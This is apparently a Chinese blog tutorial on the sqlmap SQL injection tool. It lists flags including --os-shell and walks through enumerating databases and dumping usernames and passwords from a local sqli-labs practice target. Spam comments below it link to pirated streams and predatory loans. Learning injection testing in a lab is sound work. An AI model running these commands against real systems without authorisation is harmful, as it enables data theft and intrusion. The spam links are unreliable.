首页 / 笔记
发表于,更新于

sqlmap用法

sqlmap用法

一个好用的语法

sqlmap -r 1.txt --dbs -level=3 -risk=3 --batch -p "id" --proxy http://127.0.0.1:8080

-u                       检测注⼊点
--batch              所有选项默认
--dbs                  列出所有的库名
--current-user         当前连接数据库⽤户的名字
--current-db           当前数据库的名字
-D "mysql"        指定目标数据库为mysql
--tables                     列出数据库中所有的表名
-T "user"                   指定目标表名为'user'
--columns         列出所有的字段名
-C 'username,password'              指定目标字段
--dump                     列出字段内容
-r                        从文件中读取HTTP 请求
--os-shell                  在特定情况下,可以直接获得目标系统Shell
--level 3                    设置sqlmap 检测等级 3

使用方法
抓包获取请求包
2024-04-09T06:16:36.png
将请求包内容全部放在1.txt文件在

python sqlmap.py -r 1.txt --dbs -level=3 -risk=3 --batch -p "id" --proxy http://127.0.0.1:8080
//-r 读取文件 这里1.txt 是读取请求包
//--dbs    列出所有数据库名
//-level=3 -risk=3    请求数据包的速度和类型 默认都为1
//-p "id"    告诉它哪个参数是注入点
//--proxy http://127.0.0.1:8080

2024-04-09T06:16:54.png

win11中使用sqlmap

python sqlmap.py -u http://10.4.7.142/sqli-labs-master/Less-1/?id=1
 python sqlmap.py -u http://10.4.7.142/sqli-labs-master/Less-1/?id=1 --batch    
 //--batch 是按照默认选项来,不需要在敲y了

2024-04-09T06:17:03.png

python sqlmap.py -u http://10.4.7.142/sqli-labs-master/Less-1/?id=1 --batch --dbs
//--dbs 意思是列出所有数据库名

2024-04-09T06:17:16.png

python sqlmap.py -u http://10.4.7.142/sqli-labs-master/Less-1/?id=1 --batch --current-db
//--current-db 参数的意思就是当前数据库名

2024-04-09T06:17:28.png

python sqlmap.py -u http://10.4.7.142/sqli-labs-master/Less-1/?id=1 --batch -D "security" --tables
//-D "security" 指定数据库
//--tables 列出数据库中所有的表名

2024-04-09T06:17:37.png

 python sqlmap.py -u http://10.4.7.142/sqli-labs-master/Less-1/?id=1 --batch -D "security" -T "users" --columns
 //-T "users"    指定表
 //--columns    查有哪些字段

2024-04-09T06:17:55.png

python sqlmap.py -u http://10.4.7.142/sqli-labs-master/Less-1/?id=1 --batch -D "security" -T "users" -C "id,password,username" --dump
//-C "id,password,username"     指定目标字段
//--dump    列出字段内容

2024-04-09T06:18:09.png

标签: SQL注入, sqlmap

许可协议

本文作者 , 采用 CC-BY-SA-4.0 许可协议,转载请注明出处。
上一篇 CTFHUB-SQL注入-整数型注入

已有 12 条评论

添加新评论

  1. mgvprdkfau mgvprdkfau

    哈哈哈,写的太好了https://www.lawjida.com/

    回复
  2. wujuwwonyz wujuwwonyz

    《数码宝贝大冒险tri. 第5章:共生》动画片高清在线免费观看:https://www.jgz518.com/xingkong/39644.html

    回复
  3. esjlshvixd esjlshvixd

    《拉塔莎的情歌》记录片高清在线免费观看:https://www.jgz518.com/xingkong/101189.html

    回复
  4. zjikxpagnb zjikxpagnb

    《极地之战》科幻片高清在线免费观看:https://www.jgz518.com/xingkong/23746.html

    回复
  5. ghinsldpvn ghinsldpvn

    《星球大战5帝国反击战》动作片高清在线免费观看:https://www.jgz518.com/xingkong/152343.html

    回复
  6. aetuqkmwgx aetuqkmwgx

    兄弟写的非常好 https://www.cscnn.com/

    回复
  7. xsycprdkiv xsycprdkiv

    看的我热血沸腾啊www.jiwenlaw.com

    回复
  8. qvwovqxeti qvwovqxeti

    看的我热血沸腾啊https://www.ea55.com/

    回复
  9. mskqthepfr mskqthepfr

    想想你的文章写的特别好https://www.237fa.com/

    回复
  10. pgcxoweplp pgcxoweplp

    博主真是太厉害了!!!

    回复
  11. 2024高炮口子秒下款 2024高炮口子秒下款

    ryafzu92430LA-100%通过的小额贷款有哪些http://www.slearning.cn/tags-67971.html/

    回复
  12. 2024高炮口子秒下款 2024高炮口子秒下款

    ryafzu92430LA-100%通过的小额贷款有哪些http://www.slearning.cn/tags-67971.html/

    回复